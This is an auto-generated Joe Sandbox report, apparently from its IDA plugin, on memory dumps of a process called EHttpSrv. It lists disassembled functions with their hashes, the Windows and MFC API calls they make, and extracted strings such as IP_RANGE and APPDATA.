                                                                                                                • Opcode ID: e27f454289218852687a0a50fc370cd0d11d2e5be6741b802adb9106cb9d2f23
                                                                                                                • Instruction ID: d6b260b91b2afa18662dcd0aa496fce44bf5087fc199903c461d7b48f04e172e
                                                                                                                • Opcode Fuzzy Hash: e27f454289218852687a0a50fc370cd0d11d2e5be6741b802adb9106cb9d2f23
                                                                                                                • Instruction Fuzzy Hash: 7011B6F0D01B508BD621DF6A9841A57F7F9BFA0604F548D1EE19AC3A20D3B9F5448F41
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$#1894#2651#4119#5609
                                                                                                                • String ID:
                                                                                                                • API String ID: 3214300710-0
                                                                                                                • Opcode ID: 1e99c9a13bc6be8278a85a2e538068f55881aa7fabc93538300013c71da43b19
                                                                                                                • Instruction ID: a0c356166229a589cb426dd41d67ea829bd0afa39bcfa3783ce831c5abca2097
                                                                                                                • Opcode Fuzzy Hash: 1e99c9a13bc6be8278a85a2e538068f55881aa7fabc93538300013c71da43b19
                                                                                                                • Instruction Fuzzy Hash: D91194712087025FC204DFA9C880D6FB7E8FBD9614F008A1DB98593250DA38ED05CB91
                                                                                                                APIs
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 2043BAF1
                                                                                                                • GetObjectW.GDI32(00000000,0000005C,?), ref: 2043BB01
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 2043BB0C
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 2043BB14
                                                                                                                  • Part of subcall function 2043B8A0: GetTextMetricsW.GDI32(?,?), ref: 2043B8B1
                                                                                                                  • Part of subcall function 2043B8A0: GetTextExtentPoint32W.GDI32(?,2048B8C8,00000001,?), ref: 2043B8C4
                                                                                                                  • Part of subcall function 2043B8A0: memset.MSVCR80 ref: 2043B8D3
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 2043BB3C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 2043BB43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$SelectText$CreateCurrentDeleteExtentFontIndirectMetricsPoint32memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2269657172-0
                                                                                                                • Opcode ID: 8d39f8bf82fdabb041275fa10538bb64814c54a3a0a6bb52cd58f27b94c9564d
                                                                                                                • Instruction ID: c0e3721598ee792724bbe563eaaf6ce25a994d6c8023372eb2cb07eff0f08ebf
                                                                                                                • Opcode Fuzzy Hash: 8d39f8bf82fdabb041275fa10538bb64814c54a3a0a6bb52cd58f27b94c9564d
                                                                                                                • Instruction Fuzzy Hash: 321130B5508705AFD310EFA48C89A7BB7ACFB89606F108C1CFB5592255DE7998048BA2
                                                                                                                APIs
                                                                                                                • SetRectEmpty.USER32(?), ref: 204384B3
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204384C2
                                                                                                                • GetDC.USER32(?), ref: 204384D4
                                                                                                                • #2361.MFC80U(00000000), ref: 204384DB
                                                                                                                • GetTextExtentPoint32W.GDI32(00000000,2048B8C8,00000001,00000000), ref: 204384F6
                                                                                                                • ReleaseDC.USER32(?,?), ref: 20438504
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#2361EmptyExtentPoint32ReleaseTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1840419848-0
                                                                                                                • Opcode ID: a581caf8df79517cd945ad324e0a4fd0f37ce596f542015ce5c6ca5b8c9c3f65
                                                                                                                • Instruction ID: 496008046cc68aad03aa913379702d96c16767321fb24cf3775948f9e0ec9cee
                                                                                                                • Opcode Fuzzy Hash: a581caf8df79517cd945ad324e0a4fd0f37ce596f542015ce5c6ca5b8c9c3f65
                                                                                                                • Instruction Fuzzy Hash: 3D017072204705AFC714DFA8CC89867BBECFB88219B00CA1DF98587644DA74E809CBA1
                                                                                                                APIs
                                                                                                                • #656.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D33
                                                                                                                • #656.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D43
                                                                                                                • #741.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D53
                                                                                                                • #741.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D63
                                                                                                                • #587.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D73
                                                                                                                • #605.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #656#741$#587#605
                                                                                                                • String ID:
                                                                                                                • API String ID: 2045721391-0
                                                                                                                • Opcode ID: e2b5862769a4427eae46f48d823d9ee51c2a6fd6aec84f59f66b854840967707
                                                                                                                • Instruction ID: 9f5cefbeefa0941ab7df07d9c822c4b112fbf010f8018cdb454d69d8254480c9
                                                                                                                • Opcode Fuzzy Hash: e2b5862769a4427eae46f48d823d9ee51c2a6fd6aec84f59f66b854840967707
                                                                                                                • Instruction Fuzzy Hash: 67015A710087818BC315CF24C855BEABBF4FB65728F80CE1DE0E6936A0DB786609C796
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 20439B96
                                                                                                                • memset.MSVCR80 ref: 20439BEA
                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000200,?,?,?,?,?), ref: 20439DE8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateFileHandlememset
                                                                                                                • String ID: $$0
                                                                                                                • API String ID: 2300874326-389342756
                                                                                                                • Opcode ID: 057662e644b0b9a3d99144212f4c6014112c615fb078cfd1729006145fb7cb57
                                                                                                                • Instruction ID: 04d4c340668600435f704b31e0fa8d8e5d729e4efcc25c61fd6eacbfdca0a0c7
                                                                                                                • Opcode Fuzzy Hash: 057662e644b0b9a3d99144212f4c6014112c615fb078cfd1729006145fb7cb57
                                                                                                                • Instruction Fuzzy Hash: 4191F8B15083419FD350DF64C885BABBBE9BBC8744F10892DF999C7290EB78D944CB52
                                                                                                                APIs
                                                                                                                • GetTextExtentPoint32W.GDI32(?,2048B8C8,00000001,?), ref: 2043B5F8
                                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 2043B633
                                                                                                                • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 2043B673
                                                                                                                • DrawTextW.USER32(?,?,?,?,00008020), ref: 2043B6CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ExtentPoint32$DrawMetrics
                                                                                                                • String ID:
                                                                                                                • API String ID: 7047841-3916222277
                                                                                                                • Opcode ID: a6e062c6499c17f33c23375c66fc969aad25fadcdc9bef878475d3043f4a74b2
                                                                                                                • Instruction ID: cd33e530e8e5d1403df619d4bd40830191e19536f182b1d6df7ce893f6c7a7bf
                                                                                                                • Opcode Fuzzy Hash: a6e062c6499c17f33c23375c66fc969aad25fadcdc9bef878475d3043f4a74b2
                                                                                                                • Instruction Fuzzy Hash: 288125756047018BC764DF68C981AABB7F1FF88204F509A1DE5CA83B51EB34E949CB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045574E
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 204558D9
                                                                                                                • #6232.MFC80U(00000000,?), ref: 204558F0
                                                                                                                • #6751.MFC80U(00000000,?,00000000,?), ref: 20455922
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #314#6232#6751MessageSend
                                                                                                                • String ID: DetectAppChanging
                                                                                                                • API String ID: 4076680601-2516610685
                                                                                                                • Opcode ID: dd83c7099006d640d4028cd5ef4313dbfd9bec513ddbd34065a42c64c41d866c
                                                                                                                • Instruction ID: 01685508ceafbcd4e3093f46b1938b49ce02c36cf81fe32ffcfde260fc9db048
                                                                                                                • Opcode Fuzzy Hash: dd83c7099006d640d4028cd5ef4313dbfd9bec513ddbd34065a42c64c41d866c
                                                                                                                • Instruction Fuzzy Hash: 525183715087419FC314DFA4C8D0BAAFBE5BFA4718F508B2DF19897290C778A958CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D00F
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D065
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D0A5
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D101
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 20442E95
                                                                                                                • swprintf_s.MSVCR80 ref: 20442EB4
                                                                                                                • swprintf_s.MSVCR80 ref: 20442F3F
                                                                                                                  • Part of subcall function 2043C6E0: free.MSVCR80 ref: 2043C71E
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20442FAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$CriticalSectionswprintf_s$EnterLeavefree
                                                                                                                • String ID: NODE;NAME=%s;TYPE=SUBNODE
                                                                                                                • API String ID: 1679566870-1146357381
                                                                                                                • Opcode ID: 300c08941aa98cdd12e71b9335bfd12ee22951b283c6f9c713b90c7db156eaf8
                                                                                                                • Instruction ID: f148fae018eb77c923de99daf751580223cfb0c657fecf375db81c05a93d6ced
                                                                                                                • Opcode Fuzzy Hash: 300c08941aa98cdd12e71b9335bfd12ee22951b283c6f9c713b90c7db156eaf8
                                                                                                                • Instruction Fuzzy Hash: 8841C7706087015FE314DFA4C981B6BB7E59FA8608F90882CFE8983341DA7DE94DD792
                                                                                                                APIs
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E145
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E179
                                                                                                                • #1176.MFC80U(?,00000000,IP_RANGE,2041F192,?,?), ref: 2041E1A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$#1176
                                                                                                                • String ID: %d.%d.%d.%d$IP_RANGE
                                                                                                                • API String ID: 2565221431-1721630847
                                                                                                                • Opcode ID: 49220e3e8c8959c2477940a03975da61ffd8b4cd5e5257e2152aac5567fa5f25
                                                                                                                • Instruction ID: 8c70e820a42cc0ef8199f5320f7b48e118a5ff02f37061a88ee0ced0dda78f7a
                                                                                                                • Opcode Fuzzy Hash: 49220e3e8c8959c2477940a03975da61ffd8b4cd5e5257e2152aac5567fa5f25
                                                                                                                • Instruction Fuzzy Hash: E321F375008654AFD3248B968C80F37F7E9AFC9704F09CA8DF9A807292D639F9449B20
                                                                                                                APIs
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E205
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E239
                                                                                                                • #1176.MFC80U(?,00000000,IP_RANGE,?,00000000,IP_RANGE,2041F192,?,?), ref: 2041E260
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$#1176
                                                                                                                • String ID: %d.%d.%d.%d$IP_RANGE
                                                                                                                • API String ID: 2565221431-1721630847
                                                                                                                • Opcode ID: 009708743ea9818ec7ad0d2cc6a41fbe2433ea119526d0ec921832998b0044b0
                                                                                                                • Instruction ID: 61b2732691e54731793042617214c6e827681a1db8e85d9a3db6ce66c5009b46
                                                                                                                • Opcode Fuzzy Hash: 009708743ea9818ec7ad0d2cc6a41fbe2433ea119526d0ec921832998b0044b0
                                                                                                                • Instruction Fuzzy Hash: 962120340096549ED3648B96CD90E33F7F9ABCAB04F09C98DF8A4472A2D238F9449B20
                                                                                                                APIs
                                                                                                                • GetEnvironmentVariableW.KERNEL32(APPDATA,00000000,00000000,?,?,00000074,204411DB,?,00000000), ref: 20442D9A
                                                                                                                • malloc.MSVCR80 ref: 20442DAF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentVariablemalloc
                                                                                                                • String ID: APPDATA
                                                                                                                • API String ID: 1015899132-4054820676
                                                                                                                • Opcode ID: e5ed7cc41b6f1eeb17cad5362a1277d3937bd62b615e593f88bc3bc90783f534
                                                                                                                • Instruction ID: 399d6329eac5c24fb3c80049560c3f0fde6e9d094a0bf09a4978420cbd522793
                                                                                                                • Opcode Fuzzy Hash: e5ed7cc41b6f1eeb17cad5362a1277d3937bd62b615e593f88bc3bc90783f534
                                                                                                                • Instruction Fuzzy Hash: 8311BFB26057026AE310DF85DC84B67B398FBC4756F10892EFA4186240EB79E918C7A6
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$swscanf_swcscspn
                                                                                                                • String ID: ;,
                                                                                                                • API String ID: 372877846-2160969846
                                                                                                                • Opcode ID: 115a5b567d316050a3f747767341e443d573e0f1640489c73d189da7d107d0af
                                                                                                                • Instruction ID: 83b26625e96d8970be58b0dd86d482f679ae9785e3e383a395c437aaa651944f
                                                                                                                • Opcode Fuzzy Hash: 115a5b567d316050a3f747767341e443d573e0f1640489c73d189da7d107d0af
                                                                                                                • Instruction Fuzzy Hash: 2811E771601213A6EB108F94DC8456773E4FF80266F10DD2DFD51A3240F77D9D5587A1
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32 ref: 2045F989
                                                                                                                • ScreenToClient.USER32(?,00000000), ref: 2045F99B
                                                                                                                • #3793.MFC80U(00000000,?,?), ref: 2045F9B6
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 2045F9D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3793ClientCursorMessageScreenSend
                                                                                                                • String ID: F
                                                                                                                • API String ID: 2192606099-1304234792
                                                                                                                • Opcode ID: c1b02fb2e73d36783ef106c15e9ce598c6b04e6ea6825887fd932bac7e8e4ee9
                                                                                                                • Instruction ID: 80928f24070fcba48f7bac73c9c1762405fb736f405f160aeaa39f66132af33b
                                                                                                                • Opcode Fuzzy Hash: c1b02fb2e73d36783ef106c15e9ce598c6b04e6ea6825887fd932bac7e8e4ee9
                                                                                                                • Instruction Fuzzy Hash: AEF081B5508705BBC304DB64CC89FA7BBECEB88715F00CA1EB99983190EB74A804C792
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32 ref: 2045CF19
                                                                                                                • ScreenToClient.USER32(?,00000000), ref: 2045CF2B
                                                                                                                • #3793.MFC80U(00000000,?,?), ref: 2045CF46
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 2045CF65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3793ClientCursorMessageScreenSend
                                                                                                                • String ID: F
                                                                                                                • API String ID: 2192606099-1304234792
                                                                                                                • Opcode ID: d3287485287acd700b6024ef1f140c52c484e9c25ee022c7e01d1cd40f9d1640
                                                                                                                • Instruction ID: f69385dd0af284a01ae3ba057e28231b8480156d648f90a51f256bc835e075d5
                                                                                                                • Opcode Fuzzy Hash: d3287485287acd700b6024ef1f140c52c484e9c25ee022c7e01d1cd40f9d1640
                                                                                                                • Instruction Fuzzy Hash: E6F0A4B6508705BFC304DB64CC85FD7BBECDB88715F00C91DB99983290EA74A904D791
                                                                                                                APIs
                                                                                                                • #3990.MFC80U(?,00000039,FEEA6C22,?,00000000,20479989,000000FF,2044D616), ref: 2044D92A
                                                                                                                • #774.MFC80U(00000000,?,00000000,20479989,000000FF,2044D616), ref: 2044D93B
                                                                                                                • #578.MFC80U(?,00000000,20479989,000000FF,2044D616), ref: 2044D94D
                                                                                                                • #1236.MFC80U(...,?,00000000,20479989,000000FF,2044D616), ref: 2044D95A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
